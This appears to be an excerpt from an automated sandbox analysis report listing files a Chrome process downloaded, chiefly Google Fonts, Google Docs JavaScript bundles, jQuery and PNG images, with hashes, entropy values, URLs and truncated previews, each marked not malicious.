                                                                                                                                                                                                                                        SHA-256:61514A54C59FA9A216CBD4BB4FC24B58E3956088D4E0FBC85BB63160E874EFCC
                                                                                                                                                                                                                                        SHA-512:431383CB96CF7DA1E372F46DDAB4AD0DF26F86370EF52772BBA352D46CAD51B06D0662217AB945D217C1B040AF228BB114DDBEE5D3C708D589AFE6DEC97167E4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotoserif/v15/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEliotp6I.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............N....a..........................P...,....`?STAT....P.....h..U..6..6.$..h. ..j..?..[....^..v..|.Ia@.Z.T.&1..s......m....2.bZ....i...H{.O...m./..*D..|.................,?.rs.._..{...&7....C...@.X.V.(>x..H.B..IHk&>..(g.PV)$.9.^j.H*M)...KPm..I...]...:...^....Uq]3.q.b...JM$+..f...0..y-.E.=j..C ..bP..(^..s..x2...F..9.J..=.K..CE<'."..#n....*...w*D/..H'.~...r..\.bBRZ.....]..g.M..-.u#'j].G.&?Us/..W......r...b.|.:U.m+\....-.W;...7.".Df.R]...)..;.$l.<!=..i.|.Wt.Y...Z..Fe..=.^....z.&...;.R...;,...G..ic..#...Rg.%..M.?.N.I.<U.U..$.c..hh.!.KY....jp/.zP..}.....V5.....<.....4....A..Q._...9...i.......e.J\:.....hh../.zR...[g........^. uu'D[!..@c5.......(\.`.ct....4.......!......~S./...{=S.M..x.[..e...e..J/9......R?..LUf...$..L.....G......7.+.?2..NZ.'y.....%1....j<........t..w.S..OxfN#sv.b/..cw._.-x@.I.....G...a....^.B.&../..~?S.G...L*/..<....h...*yWy...k.,...e..w.3}V..dE]Z.....?.....(..q~n..Fb..`....jC5t....2...,....a...? ..S@.7...%b.%Z...*O|...K.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (585)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1140928
                                                                                                                                                                                                                                        Entropy (8bit):5.618204984805897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:kT/8NDTAa686+3gd+/Ds5Qa7Kvu//ZUHlXLUtU:lNnAaB6+wdU8//ZKUtU
                                                                                                                                                                                                                                        MD5:B92782E114CD96DC86E31801B8690272
                                                                                                                                                                                                                                        SHA1:B7FF37F085557B0A610A0A6A0DDD18B3551B73D1
                                                                                                                                                                                                                                        SHA-256:F0820478761D4269D33A57554AE7F14271C38425DDE771587CD35D66563F7EA2
                                                                                                                                                                                                                                        SHA-512:35EAB86251346D591811293A1E87B4F4676FD721DD9C25FEFC09777C374BE9B1EEBD69B2C146CC409B2E406EAD67CD5A2023CAD7710AC39A40B3CA8234046CD1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/2374546085-client_js_prod_kix_docos.js
                                                                                                                                                                                                                                        Preview:mK(L1a);./*.. Copyright 2016 Google Inc... Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,. OUT OF OR
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22034
                                                                                                                                                                                                                                        Entropy (8bit):7.952340488936008
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:RpjgKo2CbdgGwUrdMngGDPTR5eo8kuDLNngve61Uc0VKFFmC3k:RWKtChKe23PTR5eoigveyUcKnC0
                                                                                                                                                                                                                                        MD5:888BB74555006DCBA050F049257484B3
                                                                                                                                                                                                                                        SHA1:BA0C6D15F8FCB24DAD4B2A061D55A463BB51CC52
                                                                                                                                                                                                                                        SHA-256:527731A600B270529B00047AB0E18CDF8ACD02454CDD90CEDA066E0B1DDCE067
                                                                                                                                                                                                                                        SHA-512:4DDB321A7E07F9CE84FC533A873F13DED71009C6226A883D1D72366163A004172E14B3AD7A8C0B6D1D903D441073E68BA805D5995D47D946F685AC58B48C88AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..U.IDATx...1.....0.G..2.0..0X.E...... ,.a........a...@X..... ,@X..... ,.a............@X..... ,.a..... ,.a............@X..... ,.a...... ,.a............@X..... ,.a........a...@X..... ,@X..\...n%......1....33333.......cff......Ndizf..=....47......8.../,X~xv...W..7o....f..2c...CG..?..5Y.w.^}b.W...".>)..:s...G.KN.?.....]..S.&...:...G...n...?!..t.2....5a..u..].&.........$.?QZ.JbU..wH...NjZ...;.U.p.M-......=}...E`a7$.u....y....]/w.=..[n.....G......;.?...".Vl8+....[1>.}.?..k.x.6\H~..p....5e.Zq........-;...%$.!..x.).*.,../M.@.L..4H...7Q.V.SN^..,.....U.F.q.6..z~.G.~Y.^kI..4....6..".._..O...8P...)M+.j.7.Y.. ......g.V........n...I ....E`...&..G?O.s.Q.Tu.9.U.. ....Cg.3......Y.G..Y.[...A`.X....g..w..g.....?.$[h.B]......BS$J....j..Yt.:LRAxi%..,U.X...!.......s. ..{]RG.."..."..-= ..q.K..D.>.E.T.d1.,.k.y.X03p...W.9.o.=.L.i.X.V..}......)...\....n.e...p..K?p..Ep.I.)C...B8..O.>.-7.z..8V.f].=...M.:u....k.e...Q.n.... .R.X.<.L..,.^..:
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):89501
                                                                                                                                                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 3616, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3616
                                                                                                                                                                                                                                        Entropy (8bit):7.930386543715654
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:DpAYv1g/yISTOyROLP5yb54Sfbib1UPXavmk7iD:DpZ1gqlTOyRA+54SfbiskGD
                                                                                                                                                                                                                                        MD5:710CA7880CB166E61C4E6F32EB58CECB
                                                                                                                                                                                                                                        SHA1:ADB82ABBC275F90C47EE2082275343FCDCFBD6F3
                                                                                                                                                                                                                                        SHA-256:3E34CAEB1570F09F03ED4AEFE201F53139321BDF043516388A8DAFCFEBED66BF
                                                                                                                                                                                                                                        SHA-512:F1E24F80418BB83E8D6B9280F6472D48C6654283F4D172FA776B369A250CF80EA48A94F596816028809FC7219E54107DACA6D5324AA2620AA4D654C2DE4BCDCC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/spectral/v14/rnCr-xNNww_2s0amA9M_kng.woff2
                                                                                                                                                                                                                                        Preview:wOF2....... ............................................`.....d.......x.\....6.$.0. ..4.=..o......l...6R.W......AD.....a)....`..;.....eS..p>...If.'......P..RO.z..|.....+F.\..m.....`..%k9.43!..m*.1.{........m........=..>0X......;lQ......\.=../9.A...Zj....@.#..h+t.......$......MX...!....[a[_.j}*..mC.YsQ...{3y....76...G...........T.4. ......O.O.!..... x }..........y.(Q....\6...0.3d..oA.+......S.`....A..v.4@.....9...`.3..y......t..Ad\....ps....H....&.N.6....S..x69.."......A..G6.j....+..p.3.a. ...t...C......v.....1..l...h.o~....ns.k]...../..aM@=..zW...g.j..6.*...n2..(1`.j.C...8.d..'.O._t:..+.+}..&l....YE^.zs...v..K./...E...9..H...<..O.....D.&.y%}....**./......q.. .s....*..^}.C..|..Z.....+[..Z1H....n.q\:.......#%.c....Y^.?&0j..iq.......3..K"..!....4..I',....P..9]N......~J'.._...|a...u]..jRS.tT.....d5.i.......i..e#,.ZtP.......7. ..D...........%...$.f....L....F.H.. .t..EB..j.yoP..N.3EUU:QL....u..#........#)j.#.....ZR.&8......D..(.....mR..,..>R.uVP..J;..p...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 2484, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2484
                                                                                                                                                                                                                                        Entropy (8bit):7.903859306518773
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:/dSIWk6muY0rJJarbEgdzzTTm9fLEZAlMfJLn5HWSd1DX3Z:/0X9Y0rgbt1TK5LEOWfJ52cDX3Z
                                                                                                                                                                                                                                        MD5:9160B78EE0B90045C930EC35D1C3A91E
                                                                                                                                                                                                                                        SHA1:3DA7830A860E809B29AF6A65017D56A1FA121892
                                                                                                                                                                                                                                        SHA-256:BF2174B338F1EEBF563FDD9BD3909F5269B63AE05A9EA26A738870CC6B504B08
                                                                                                                                                                                                                                        SHA-512:A9B5CF35FC94666CA48BC4002AA72C8DD9DD79D5ED62E69B8ED823F8456A2978EB4577969187DA8733D3B927C9F052439830ECE8E2793104B099DA43B262471B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotoserif/v15/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEliotl6Z8AA.woff2
                                                                                                                                                                                                                                        Preview:wOF2...................X...............................X.`?STAT...t....l...(..6.$.L. ....k..............6.5z.3r..C.*IEM.\^x(..Yp..=3......>..n6. W"V..]-)`..=].$.,+<.......j....Y. .K......xx:../.8......7n....).KZm..7<../.!i..L..C.B......s{........X....(..k..X..`."^..R...gsw......xR......(f.*..Z)....p6...8.....W}@.....V.....a......w....,....i.#....b...H8or......e|..b).?.....S.L....g.._.#...Y..h..e..zVD.[E.y...L.m.a.2..*.D......3cU'.FV?..R...4.....f..2"\........E...HU;...i..[...[^wZn.....5a.x}.i8f ..Y}...JuEi!.Pv...s'..V..&.6..M..!....L.l:F..........X...{[>l6.s....[.O.....&(..{....z.....).!>rfF....2$..s.d...XS.4.L......u.....J.*.0..W`.a..]..$..x.=...4.1......._>M....[m.).b...8.p.!...`.....q.&B\..........9.t.....E.G..-M..T..`.7M5@............1.C...N..I...H2}....a.$....{z..L.f.$y...g`.0-6Hm....u.z.q..H."....I.cc..{..J<8A....l.._A.5.i0.`..t.D.U....4.||;N.G.Vo^dk....FMFt...........'~.U|.;C. i...&pr..7.t2.c(.p.N\8.h..g..0 $y...5....u]..{../.S..!.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):62732
                                                                                                                                                                                                                                        Entropy (8bit):7.99366744906437
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:NC97sPjy7md+1n5Hqw6Rx072SA6dJY4SOOreetgS7:NC97sPjy7md+149b6/SO9etgm
                                                                                                                                                                                                                                        MD5:FB77E4D2FCE5E4591C3417F9FDD1A1E1
                                                                                                                                                                                                                                        SHA1:2FF14C32E66A08A800642B7422E16F74ACDF68EE
                                                                                                                                                                                                                                        SHA-256:43B2DABA8D0AF31C79835FA37F533E91A03E283C97FBBC190AFB44F900B3D376
                                                                                                                                                                                                                                        SHA-512:B1ADBC2EB5F913D0AEF965BF794D9D779E6631079A8716F23A6631D9E50FABBE03B2BB763D40DE4A7A188E3EA2A7E2E7D012E5120DC015B3C3F2B37EFE34C279
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...1........_Y+.zB...G..... ,.a.....@eg...6r......8q...$m....1.}.........|Tfn.....^.'.FO.l....>.{..JZi4z53.........aY.,.c.^!..".r..e.....B..Rh....,.'|..ih...#Y.I..5.R)....2.......DK..o.......W]J=h.M.....)).......OZ.R#"......y.bWD.........FBe.qL.3ct.......MG"E..z..+95]Q^ZXX..jK_...\w.....IH....(H2....Hb........mmmUUU.(.w..a..?!.K..4...X.iw(..y..,....g`}G.o.f.+. K`..e........M.b..I.M.8~..@o..y../x ......M..DE.h..P..6.M.Y.....0...........].$1....Y......(...~.`<~..?.O!&.Q...5.%x.........(Lo>Cn..K...X...........lbg2.@.....O;s...{.~.-.}=..a...H.......M.c.j._RV.J.v.w."..+.F.c##.=.....h.R..5X)a.U?.J.....r...........9.b..h6...lWJ...>....\.iI,v.h.S.+..Tn.e(.`K.....TzN.p.s]]]tZ..U/...)Oui..........uk7..."..e.J..H..1~..S(....Cn8.S%7.p..j..wb..YBi.H$"\.b....G.....L.E.l?s....".O...djY.n>..h8\./........N.[....0:.L....][W.]....N.B.u+..UdU....."J.mY.$cJ.M..J.......f.g.......w...._.s.2w..=.KAB.C.:....i.X.b.....j..(".
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 46840, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):46840
                                                                                                                                                                                                                                        Entropy (8bit):7.994725589879299
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:pBa1htdmJ4nDdfoc4qb4WcelHHWo7hW9Igq0AapIqFjiIparJ1KQCiVOQXV47G6x:pc/bhDr4MLlWo7hzrn0Iq8IpMzfvV464
                                                                                                                                                                                                                                        MD5:FA1ADF616690586A617E2F265AB761B0
                                                                                                                                                                                                                                        SHA1:802AF2A60A925A68A50C3BD3C157D284E1B51362
                                                                                                                                                                                                                                        SHA-256:28AFB7554B3B29A5587799EACC92FD889378089FD568E5C8430B41D83D012B3E
                                                                                                                                                                                                                                        SHA-512:5C2AD9BC7116418A763A8D2AD6D5B458AB38480D2B31441EC8FD97E1FD708535E447A8991211A4BAC846AE5F0AD9FAC206FFEC1D07C3B1523128E6E0477FBAD3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lora/v35/0QI6MX1D_JOuGQbT0gvTJPa787weuyJD.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............<..................................h..8.`?STATH...........F..r..6.$..`. ..h..r..[h....nE{...9.dsXJ1L...n.SV.......^mYF..td..a.....................S.h.unv.jf.Oa.> v!1..#"...G.\r..&.a2/.0./V....T6?.%..G.tyc[...+..H ..9.v..J.}A.%%..*.M.D...$.jX..........*....u."...y......T.&.A...R....*....,X.z...;C01..F..Re#E+H.].b4T=g.*..S.z.[.{.&.sv....-.....{.{g:...K^.-.~...7...L..W..v.....p4.\.F9......3....Q..'.LO-..E.......W..?...4!.v.G."'T..zV..dsU.$..T<...tM.T...y3}^E..I}......"..bi.q..|!...I..Y.>..,.9......lc.....=R..C..PTPD,DT...0.0..#...........X ......y.m..;........ZD..+...?...Z.4....5bm_..m..5.[......>.... 6......1..`0.....F7..P..{`.s".........}....n~.[o.g.........Z..Z.".....2X...Y....~k...(..K.....!4.H..{>.o.:."!....A_M0.2..9._[..-..p..........h...YB.7k...k.....^..?..?..P..r._.M...d&..O.:..g....oU....9H7..(.}..}U...z]...-. .Y..tw...k.a......9..J....V.;..g...'.p...........6.8.YGdc......H.D.i....K...e....[$.]'..v...*).C..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1862)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):39989
                                                                                                                                                                                                                                        Entropy (8bit):5.5692932854509785
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:HSvDieYI0ORrsgvk3SmckV9Lg22Lch6RNBoQ2J8GDqw8kDJbYyWNmGx6M7Fv8di1:yvDRsgdTb0SN/GXFCmQ3FvoiOsHEFU
                                                                                                                                                                                                                                        MD5:FA27C359D60B5B52488C247E8BA79342
                                                                                                                                                                                                                                        SHA1:0EB0187702C68CDB1EB3DDCCC5F9F551191D02F2
                                                                                                                                                                                                                                        SHA-256:DC52E949FDEA807F5F3AA7E4A056B5EA870F5D4747F21EE3742740F9DFB20E96
                                                                                                                                                                                                                                        SHA-512:1C56F8C2721A8AF3C1D032B5745CE09C553E1DD58FCCB30292BE1E5F44B8C7A476444FBE070D2B4BA77A0AB0FB2EA3B72041B7E5A3AB98250BA593A9D5CA7CDC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/3549632437-client_js_prod_voice.js
                                                                                                                                                                                                                                        Preview:mK(Ueb);.var ZBx="docs-mic-palette-body-active",$Bx="docs-mic-palette-body-hover",aCx="docs-mic-palette-focus",bCx="docs-mic-palette-help-hover",cCx="docs-mic-palette-recording",dCx="docs-palette-dictation",eCx="docs-voice-bubble-close",fCx="docs-voice-bubble-heavy",gCx="docs-voice-offline-bubble",hCx="https://docs.google.com/reserved/spoken_emoji",iCx="https://docs.google.com/reserved/spoken_punc",jCx="https://support.google.com/docs/?p=voice_typing",kCx="stopped";Rsq.prototype.D=X(1762,function(a){return vYb(a)});.DT.prototype.QXa=X(1545,function(a){this.D.uIa=a});ptq.prototype.QXa=X(1544,r());Zff.prototype.H=X(1265,function(a){a=a.target;for(var c=0;c<this.D.length;c++){var e=this.D[c];e&&e.Ba()&&kJ(e.Ba(),"docs-palette-top",e==a)}});YZc.prototype.xOa=X(550,function(){return!!this.D.H});zsd.prototype.xOa=X(549,function(){return this.D.xOa()});YZc.prototype.sCa=X(548,function(){this.D.ix()});zsd.prototype.sCa=X(547,function(){this.D.sCa()});.YZc.prototype.rTa=X(546,function(){var a=t
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2086)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):5058099
                                                                                                                                                                                                                                        Entropy (8bit):5.64543696872592
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:kZPlj2xIWGkhnH7r8JskiYdEw3NGv86GKN6:kZDL5
                                                                                                                                                                                                                                        MD5:C152C641D21E3F616552AD842BD2A0C9
                                                                                                                                                                                                                                        SHA1:9FA46644AA0D210F0F725B0E141434B7C191828F
                                                                                                                                                                                                                                        SHA-256:4AB2964695C041EB64AB4D65A8B8810732D6F0FBBEA9407CCBFBC445C16CE81B
                                                                                                                                                                                                                                        SHA-512:6603C7498E255D4FF8C0A2606913DB2BC946DFDBE80CAADD86DDBC3127FD4546D0682DFA4E498AEC27B70AAF728E16D11A278576EE994799F378A4DBE7E81CE1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/280474012-client_js_prod_kix_tertiary.js
                                                                                                                                                                                                                                        Preview:mK(T1a);./*.. Copyright 2021 Google LLC.. Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License..*/./*.. Copyright 2024 Google LLC.. Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 50664, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):50664
                                                                                                                                                                                                                                        Entropy (8bit):7.99441041171138
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:SGOZcxOtnS9UcAJ0dck+XFTh3KttBOI0Y9siZGkbS9:SGjQS9UcAJ0dck+X5JKBOPOm9
                                                                                                                                                                                                                                        MD5:2EAE80C528D1D7A39C57805DE3E9C799
                                                                                                                                                                                                                                        SHA1:37ED517E2F44EF14D8F2C4679F9EAD44B050759F
                                                                                                                                                                                                                                        SHA-256:46B9F52EC517DDFAC84DD566720D00CF3C54AEFF1D543AA9C95FFF830985FA13
                                                                                                                                                                                                                                        SHA-512:84DB87D648A4823380EDE80089F3E1683B11B70703CF5BD540A11C55859AFC2D063173AD89C9C448AA3A8C855329B242E032F42AB7C8E384E85B82E5C9BF3D98
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lora/v35/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFkq0.woff2
                                                                                                                                                                                                                                        Preview:wOF2............................................. ...Z..h.`?STATD........X..>..f..6.$..H. ..L.....[....r....@..*mp...M/.6.MJ.sl:.....4..m................c...{.T.4..[.m........S.i..s_......0..6{.).``..&.;B....rHI./..b..` .)..b..,.{.....f...QJK|vh....VuW..?...M.....2.........8..b.9@B..{.Q...'S.|..&f~..x..8....!%..k...x...%o.)./])[...N.G<.#.!/D..U.ZN'.e..b/.;LL.."..B4K.nr.$.R.~..E*z.A...C.4i..o....4.....o!.z."...'u.z..Hh.....KO.T........T.......w=..=.swe.W..._t^.....O.Q.!o..N.]l.! ....D...k...tkv/...I..+...B(R..&"6.A.<M...ED.*""(B.4...@J{l..."6Zx.....U.3./ ........9.......r{w.*.E..V...m............"-....PZQ.Q6.....e.B.AR}.'...f.....+..'.....5.Dl~lj........-.RJ..T2.7...p...B......Pe....aDCX.]..Z......"4.t..b,.j...<.(.Au/M.j....O.i.P{DE`KN.P....\$]....U..B.R....3....hi07p.....ynx...0.@0...3.B....i....b+...r.4..6.L).pq.c.nM.p..;.t...+.+,!.....L_(.......x...m._{..FB...h"Eo$.J..C...$..y-6.........5K~../#...P..J...O......++.8.5....y..q....L...V.(
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 39516, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):39516
                                                                                                                                                                                                                                        Entropy (8bit):7.994435722506664
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:eUEh2+iKBVQbBhu8vjenqz2Ez6Y/AxHLEaP72sV9qKYbDblXqhP8qwFSE3uk:eUEEoBVQDjeQaLnP2pfZTqgSEB
                                                                                                                                                                                                                                        MD5:9436AFFC97843765A966B3568FA7E5EC
                                                                                                                                                                                                                                        SHA1:7BFDA74BB30589C75D718FBC997F18C6D5CC4A0B
                                                                                                                                                                                                                                        SHA-256:7165713D3E1A610399471A5E93D5677508F62EF072C1151E72273BF4BD54F916
                                                                                                                                                                                                                                        SHA-512:473EC3A843C33E18D6D194651FE11353FCD03A7959225FAEABF8C77484155EA6A7BCCB72DBAF2093ED53C408FAA3BE9F6FC907F7A5DDF8223375F9D09B504456
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/googlesans/v29/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......\......s .....................................4?HVAR...`?STAT..'(.../.......P..L..*.0..^.6.$..L. ..4..<..[.^q.=m..\.m.E@z....N...{.WP....+.......RR.C.%-. N.AG.. .,. .I5vDr.Vg...D..D...%Z7.*.o..h....3Q/.u7.&8............3J....z.k....'4..G'..)K..7$mAT..CPAW.....v.~......=S..0Mb5...dh.a%4F..........z......K..C.0.....<.:......]..-...ii.....x..?U=......PN.N.rDfo....?....I..B..A4.*.T.<P..+.*F?Ps..Pq*../5....z.TJ...Xd........U.*!`c.V..i.6....yQ......_.4......A...KSZ.........K.5.[....vQQd|..B.O$4.I.B.R|..w=..W...G...).....(.."<....d.(.P.p..L.)......._.z.......G..y.gTh/$...<.rB.?...f...F.HHH...JK}..{.._,.K.{..7.kR....g#0C ....I.r.3.[...gZ.^k.J....NK)B.q{.a.qj.>-..#s..ub$I.d..RNK..tO.......Cq ....u..z.SZ`>.e.d..........H..~<.. .3...I........(../..D...2z.3z..aF.../a.Uu.<.k..}if..>....(....3.@.i*.H.q1A....J..A..M.Y"%..f..@.T.%.....]...MA.).-.*[......?...El..*.Al.k..Y.jd.t.#......K...W..UZ_ey..;.{.c.E...8..R...jWW..[R...f.ak..`X.R..d...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                                        MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                                        SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                                        SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                                        SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
